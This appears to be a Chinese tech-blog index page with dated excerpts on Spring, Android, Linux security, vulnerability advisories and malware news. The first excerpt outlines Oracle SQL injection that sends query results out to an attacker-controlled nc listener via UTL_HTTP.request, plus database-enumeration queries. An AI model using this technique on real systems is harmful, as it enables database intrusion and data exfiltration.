Oracle注射技术——Oracle+nc注射

2017年02月05日 18 阅读

首先外网nc监听对应的端口 and UTL_HTTP.request（"外网ip:port/"（sql语句））=1-- 爆库： select owner from all_tables where rownum=1 select owner from all_tables where owner<>"第一个库名" and rownum=1 select owner from all_tables where owner<>...

Spring 集成hibernate事务管理（aop实现）

2017年02月05日 16 阅读

<beanid="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager"> <propertyname="sessionFactory"> <refbean="sFactory"/> </property> </bean> <tx:adviceid="txAdvic...

僵尸网络成为网络安全最严重危害之一

2017年02月05日 16 阅读

一、引言 近年来随着金钱的不段诱惑，和体内荷尔蒙的过多分泌，造成很多技术性天才做着一夜暴富的春秋大梦，越来越多的黑色产物不断的诞生，从2003年国外某安全团队第一时间发现sql 注射漏洞之后，到2004年国内几个天才高手开发出第一款NBSI国内第一款全自动后台扫描注入工具的诞生，随之而来的是更多的国内外网站被入侵，从国外的一份安全报告上来看，NBSI已经成为了国外检查相关站点进行渗透攻击测试的最有力武器，国人的伟大的智商让国外的黑客团队都大为钦佩，也算是...

Spring 手动实现aop管理事务

2017年02月05日 18 阅读

1.事务的使用：每次对数据库操作我们都要beginTransaction，显然是不行的.（比如一个业务中多次操作数据库，但是当某个方法出错或是..我们需要回滚，但是每次操作我们都提交了;整体回滚不了，所以我们有些只能把它们绑定使用一个事务）2.手动实现aop管理事务：利用aoparound环绕拦截。拦截方法（service中的一个业务方法）之前开启事务，之后再关闭；packageorg.ymm.aops; importorg.aspectj.lang.P...

Linux服务器安全策略详解：Web服务器的安全策略

2017年02月05日 17 阅读

本章要点 ◆ Web服务器软件Apache简介◆ Apache服务器面临的安全问题◆ 配置一个安全的Apache服务器6.1 Web服务器软件Apache简介随着网络技术的普及、应用和Web技术的不断完善，Web服务已经成为互联网上重要的服务形式之一。原有的客户端/服务器模式正在逐渐被浏览器/服务器模式所取代。本章将重点介绍Web面临的主要威胁，并结合在Linux中使用最多的Apache服务器，介绍进行Web服务器安全配置的技巧。6.1.1 Apache的...

Spring中 FactoryBean和bean

2017年02月05日 17 阅读

1.整合spring+hibernate中，让spring接管hibernate的session工厂有一段代码<beanid="sFactory"class="org.springframework.orm.hibernate3.LocalSessionFactoryBean">查看源码：org.springframework.orm.hibernate3.LocalSessionFactoryBean: publicclassLocalSes...

Linux网络监控策略

2017年02月05日 17 阅读

本章要点 ◆ 安装配置MRTG监控Linux网络◆ 安装配置NTOP监控Linux网络◆ NTOP的安全策略17.1 安装配置MRTG监控Linux网络17.1.1 SNMP简介和MRTG监控过程1．SNMP简介SNMP是专门设计用于在 IP 网络管理网络节点（服务器、工作站、路由器、交换机及HUBS等）的一种标准协议，它是一种应用层协议。SNMP可以提高网络管理员管理网络的效率，发现并解决网络问题，以及规划网络增长。通过SNMP接收随机消息（及事件报告）...

Spring和Struts整合

2017年02月05日 16 阅读

1.添加struts2包2.在web.xml配置struts2过滤器<filter><filter-name>struts2</filter-name><filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class></filter><filter-...

Linux Kernel CIFS字符串转换多个缓冲区溢出漏洞

2017年02月05日 18 阅读

发布日期：2009-05-14更新日期：2009-05-18受影响系统：Linux kernel 2.6.29描述：--------------------------------------------------------------------------------BUGTRAQ ID: 34989CVE（CAN） ID: CVE-2009-1633Linux Kernel是开放源码操作系统Linux所使用的内核。Linux Kernel的cif...

浅析Spring之sessionFactory

2017年02月05日 17 阅读

我们知道当我们集成Hibernate，我们需要Spring管理事务，自然而然就需要SessionFactory来创建Session，但是我们发现在Spring依赖注入的并不是SessionFactory，而是org.springframework.orm.hibernate3.LocalSessionFactoryBean通过LocalSessionFactoryBean源码发现LocalSessionFactoryBean extends Abstrac...

微软SharePoint出现重大漏洞，安装SP2将致使产品过期

2017年02月05日 16 阅读

微软周五警告称安全人员在最新版本的SharePoint中发现了一个重大漏洞。该漏洞存在于SharePoint Server 2007的SP2更新中，在安装该更新后，SharePoint就变成了“试用版”，将于安装SP更新后的180天过期无法使用。微软称此漏洞不会影响SharePoint的安全以及性能等方面，客户资料不会受到影响，即使真的过期了，届时只是无法访问SharePoint。据微软称以下产品安装SP2后将受到影响：Office SharePoint ...

Spring 事务的传播性

2017年02月05日 16 阅读

1： PROPAGATION_REQUIRED 加入当前正要执行的事务不在另外一个事务里，那么就起一个新的事务比如说，ServiceB.methodB的事务级别定义为PROPAGATION_REQUIRED, 那么由于执行ServiceA.methodA的时候，ServiceA.methodA已经起了事务，这时调用ServiceB.methodB，ServiceB.methodB看到自己已经运行在ServiceA.methodA的事务内部，就不再起新的...

Linux渐成黑客目标 带来巨大商机

2017年02月05日 16 阅读

即便是那些销售Linux反病毒产品的厂商也知道，目前，Linux在安全方面还没有多少问题。英国一家安全公司Sophos的一位分析师，Ron O’Brien说：“我们的产品更多的用来过滤Windows病毒，而不是Linux病毒。” 去年，美国印第安纳州教育部将运行Linux的PC推到学校，在服务器上安装了开源的反病毒软件，该服务器和桌面系统连接，扫描用户接收的电子邮件。并不需要用户在自己的PC上安装反病毒工具。 印第安纳州这个项目的一位顾问Forrest...

Android中异步类AsyncTask的理解

2017年02月05日 17 阅读

最近整理笔记的时候，看到有关AsyncTask不是很理解，重新疏导了一下，有在网上找了一些资料，个人不敢独享，一并发在这里与大家共勉这里有两种解释的方法，各有侧重点：第一种解释：Async Task 简介：AsyncTask的特点是任务在主线程之外运行，而回调方法是在主线程中执行，这就有效地避免了使用Handler带来的麻烦AsyncTask是抽象类.AsyncTask定义了三种泛型类型 Params，Progress和Result。 Params 启...

研究人员发现OpenSSH的新漏洞

2017年02月05日 16 阅读

伦敦大学皇家霍洛威学院的研究人员发现了Debian/GNU Linux系统OpenSSH V4.7中的一个漏洞，它能让32比特加密文本回归到明文，攻击者的成功率有1/262144。霍洛威学院信息安全组的负责人Kenny Patterson教授称，该漏洞的危险性比以前OpenSSH中发现的漏洞要严重得多，因为它属于OpenSSH的设计缺陷，以前的漏洞更多是代码错误。这一缺陷能被用于中间人攻击，当加密数据通过时实施拦截。攻击者随后向服务器转发回数据，服务器在计...

Android中Surface和SurfaceView的一些理解和总结

2017年02月05日 16 阅读

什么是Surface？ 简单地说Surface对应了一块屏幕缓冲区，每个window对应一个Surface，任何View都是画在Surface上的，传统的view共享一块屏幕缓冲区，所有的绘制必须在UI线程中进行什么是SurfaceView？说SurfaceView是一个View也许不够严谨，然而从定义中 public class SurfaceView extends View {...}显示SurfaceView确实是派生自View，但是Surface...

Conficker蠕虫照旧忙碌 每天感染5万台PC

2017年02月05日 16 阅读

安全专家们说,Conficker蠕虫仍然在忙碌不已地感染着全球的计算机系统,名列财富1000强的大部分企业的系统皆已染毒.据赛门铁克称,Conficker蠕虫每天至少感染5万台PC.该公司上周三发布的报告称,美国、巴西和印度已成为染毒最严重的地区.“很多媒体似乎都以为Conficker/Downadup已经销声匿迹,但实际上它依然在迅速而广泛地传播着.”Conficker是从去年开始传播的,它充分利用了微软Windows的补丁漏洞和移动存储设备,感染了全球...

Android中按键消息的派发过程及源码分析

2017年02月05日 16 阅读

Android中消息的整体派发过程：接收消息——消息处理前端——窗口管理系统派发消息——窗口进行消息处理以上过程中前三步都在WmS中完成，按键消息直接发送给当前窗口，而触摸消息则根据触摸坐标位置来匹配所有窗口，并判断坐标落到哪个窗口区域中，然后把消息发送给相应的窗口。对于按键消息还会涉及到“生理长按”的检测，比如一直按住某个键，那么会产生一些列的按键消息，然而第1个和第2个消息之间往往会间隔较长的时间，这种设计是人类本身的生理特点决定的，因为从按下到弹起的...

Linux KernelNFS客户端实现MAY_EXEC权限检查漏洞

2017年02月05日 17 阅读

受影响系统：Linux kernel 2.6.x不受影响系统：Linux kernel 2.6.29.3描述：Linux Kernel是开放源码操作系统Linux所使用的内核。如果atomic_open可用的话，Linux kernel NFS客户端实现中fs/nfs/dir.c的nfs_permission函数没有检查执行（EXEC或MAY_EXEC）权限位，这允许本地用户绕过限制执行文件。厂商补丁：目前厂商还没有提供补丁或者升级程序，我们建议使用此软件...

Perl的代码整理工具

2017年02月05日 17 阅读

最近在改一个Perl脚本的代码，但是原格式糟糕极了。所有的条件判断都是在一行写完，一个缩进也没有。根本没法看。google下找到一个叫做perltidy的代码格式工具。用完之后代码焕然一新官方地址：http://perltidy.sourceforge.net/安装方法1）下载，解压，进入安装目录2）# perl Makefile.PL # make # make test # make install3） 使用方法 # perltidy script这样...